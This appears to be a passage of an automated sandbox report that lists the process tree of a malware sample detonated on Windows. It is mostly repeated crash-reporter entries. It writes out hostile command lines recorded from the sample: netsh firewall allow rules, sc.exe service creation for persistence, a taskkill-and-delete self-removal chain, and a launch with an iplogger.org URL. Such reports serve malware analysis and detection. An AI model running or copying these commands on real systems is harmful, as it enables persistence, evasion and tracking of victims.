                                                                                            4⤵
                                                                                              PID:6092
                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                              4⤵
                                                                                                PID:5528
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                "C:\Windows\System32\sc.exe" start qxlpzjol
                                                                                                4⤵
                                                                                                  PID:1160
                                                                                                • C:\Users\Admin\gbqmgigb.exe
                                                                                                  "C:\Users\Admin\gbqmgigb.exe" /d"C:\Users\Admin\Pictures\Adobe Films\DZx5P5AuNMf1sMbVI4gWxCxr.exe"
                                                                                                  4⤵
                                                                                                    PID:5912
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\yyfkqjsp.exe" C:\Windows\SysWOW64\qxlpzjol\
                                                                                                      5⤵
                                                                                                        PID:3944
                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                        "C:\Windows\System32\sc.exe" config qxlpzjol binPath= "C:\Windows\SysWOW64\qxlpzjol\yyfkqjsp.exe /d\"C:\Users\Admin\gbqmgigb.exe\""
                                                                                                        5⤵
                                                                                                          PID:1092
                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                          "C:\Windows\System32\sc.exe" start qxlpzjol
                                                                                                          5⤵
                                                                                                            PID:4624
                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                            5⤵
                                                                                                              PID:5552
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 1072
                                                                                                            4⤵
                                                                                                              PID:5296
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\JUTt0XXlyeRUvkqn6gbyZyAm.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\JUTt0XXlyeRUvkqn6gbyZyAm.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:3132
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
                                                                                                              4⤵
                                                                                                                PID:4320
                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                4⤵
                                                                                                                  PID:4012
                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                  4⤵
                                                                                                                    PID:5080
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\A92w_G5uvZzpbmIjWWGEOets.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\A92w_G5uvZzpbmIjWWGEOets.exe"
                                                                                                                  3⤵
                                                                                                                    PID:360
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\347JC.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\347JC.exe"
                                                                                                                      4⤵
                                                                                                                        PID:5168
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\60289.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\60289.exe"
                                                                                                                        4⤵
                                                                                                                          PID:5320
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\BGLGC.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\BGLGC.exe"
                                                                                                                          4⤵
                                                                                                                            PID:5612
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\G9BG8.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\G9BG8.exe"
                                                                                                                            4⤵
                                                                                                                              PID:5804
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\M871A.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\M871A.exe"
                                                                                                                              4⤵
                                                                                                                                PID:6084
                                                                                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                  "C:\Windows\System32\regsvr32.exe" -S .\b0EiM8L.W -U
                                                                                                                                  5⤵
                                                                                                                                    PID:4168
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\142D8L7E4F5FHBG.exe
                                                                                                                                  https://iplogger.org/1nChi7
                                                                                                                                  4⤵
                                                                                                                                    PID:5352
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\3oShbxuCdlpgCJQD_BOq_bm5.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\3oShbxuCdlpgCJQD_BOq_bm5.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:1404
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\xPdO43Pnm9AvZ8x9v9DSzclL.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\xPdO43Pnm9AvZ8x9v9DSzclL.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:5056
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\Gr6lwqWVuU8FA7xHFKjIPmB2.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\Gr6lwqWVuU8FA7xHFKjIPmB2.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:2744
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
                                                                                                                                    4⤵
                                                                                                                                      PID:5156
                                                                                                                                      • C:\Windows\system32\mode.com
                                                                                                                                        mode 65,10
                                                                                                                                        5⤵
                                                                                                                                          PID:1484
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                          7z.exe e file.zip -p320791618516055 -oextracted
                                                                                                                                          5⤵
                                                                                                                                            PID:996
                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\GiM6kWu0TyKl2V92hY5AhJ5D.exe
                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\GiM6kWu0TyKl2V92hY5AhJ5D.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:1220
                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\_T2Y1dPkqEkas5ZCOblw9stn.exe
                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\_T2Y1dPkqEkas5ZCOblw9stn.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:4320
                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\J4s_ZLVTS9sfZ20K2osSKTku.exe
                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\J4s_ZLVTS9sfZ20K2osSKTku.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:4200
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 612
                                                                                                                                          4⤵
                                                                                                                                            PID:5732
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 1040
                                                                                                                                            4⤵
                                                                                                                                              PID:5840
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 1048
                                                                                                                                              4⤵
                                                                                                                                                PID:6096
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\nBpw6umTRodJmOxREuzhJX2z.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\nBpw6umTRodJmOxREuzhJX2z.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:116
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\hYVW5btBkVyDEv_3Lf7PVccm.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\hYVW5btBkVyDEv_3Lf7PVccm.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:544
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\Rs7WU9X4d_zV6WTqLJWifLWX.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\Rs7WU9X4d_zV6WTqLJWifLWX.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:2528
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\y50uGC3hNLDeMkdQLqu4wsC5.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\y50uGC3hNLDeMkdQLqu4wsC5.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:1440
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 660
                                                                                                                                                4⤵
                                                                                                                                                  PID:5364
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 672
                                                                                                                                                  4⤵
                                                                                                                                                    PID:5192
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 900
                                                                                                                                                    4⤵
                                                                                                                                                      PID:6024
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 1232
                                                                                                                                                      4⤵
                                                                                                                                                        PID:4296
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\VKrfTtpTW8CDaN9q2v6WNyBy.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\VKrfTtpTW8CDaN9q2v6WNyBy.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:632
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\fEl7YAqmFEY1aVciECqpoZdY.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\fEl7YAqmFEY1aVciECqpoZdY.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:3928
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im fEl7YAqmFEY1aVciECqpoZdY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\fEl7YAqmFEY1aVciECqpoZdY.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                        4⤵
                                                                                                                                                          PID:5004
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill /im fEl7YAqmFEY1aVciECqpoZdY.exe /f
                                                                                                                                                            5⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:1180
                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                            timeout /t 6
                                                                                                                                                            5⤵
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            PID:2864
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:4704
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                        3⤵
                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                        PID:2876
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill /f /im chrome.exe
                                                                                                                                                          4⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:3856
                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                    1⤵
                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:2984
                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                      2⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:2936
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 600
                                                                                                                                                        3⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:204
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2936 -ip 2936
                                                                                                                                                    1⤵
                                                                                                                                                      PID:112
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4896 -ip 4896
                                                                                                                                                      1⤵
                                                                                                                                                        PID:3208
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4896 -ip 4896
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2736
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4896 -ip 4896
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4516
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4896 -ip 4896
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4232
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4896 -ip 4896
                                                                                                                                                              1⤵
                                                                                                                                                                PID:3636
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4896 -ip 4896
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5068
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4896 -ip 4896
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:824
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4896 -ip 4896
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:2596
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4896 -ip 4896
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:1372
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4896 -ip 4896
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:2356
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4896 -ip 4896
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:1336
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4896 -ip 4896
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:2520
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4896 -ip 4896
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:2484
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4896 -ip 4896
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:3476
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4896 -ip 4896
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:1088
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4896 -ip 4896
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4332
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4896 -ip 4896
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:1180
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4896 -ip 4896
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:4040
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4896 -ip 4896
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4200
                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                              "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:5468
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4896 -ip 4896
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:1164
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4896 -ip 4896
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4444
                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                  PID:1836
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4616 -ip 4616
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:2544
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4616 -ip 4616
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:3312
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4616 -ip 4616
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:692
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4616 -ip 4616
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:4920
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4616 -ip 4616
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:1396
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4616 -ip 4616
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:3564
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4616 -ip 4616
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:4668
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4616 -ip 4616
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:1436
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4616 -ip 4616
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:3740
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4616 -ip 4616
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:3208
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4616 -ip 4616
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:2736
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4616 -ip 4616
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:4516
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4616 -ip 4616
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:8
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4616 -ip 4616
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:3452
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4616 -ip 4616
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:4644
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4616 -ip 4616
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:632
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1384 -ip 1384
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:4132
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1384 -ip 1384
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:4620
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1384 -ip 1384
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:3716
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1384 -ip 1384
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:848
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1384 -ip 1384
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:2936
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1384 -ip 1384
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:3636
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1384 -ip 1384
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:632
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1384 -ip 1384
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:4644
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1384 -ip 1384
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:1464
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1384 -ip 1384
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:4340
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1384 -ip 1384
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:4872
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1384 -ip 1384
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:216
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1384 -ip 1384
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:256
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1384 -ip 1384
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:1580
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1384 -ip 1384
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:4472
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1384 -ip 1384
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:1688
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1384 -ip 1384
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:4284
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1384 -ip 1384
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:2852
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1384 -ip 1384
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:2352
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1384 -ip 1384
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:4476
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1384 -ip 1384
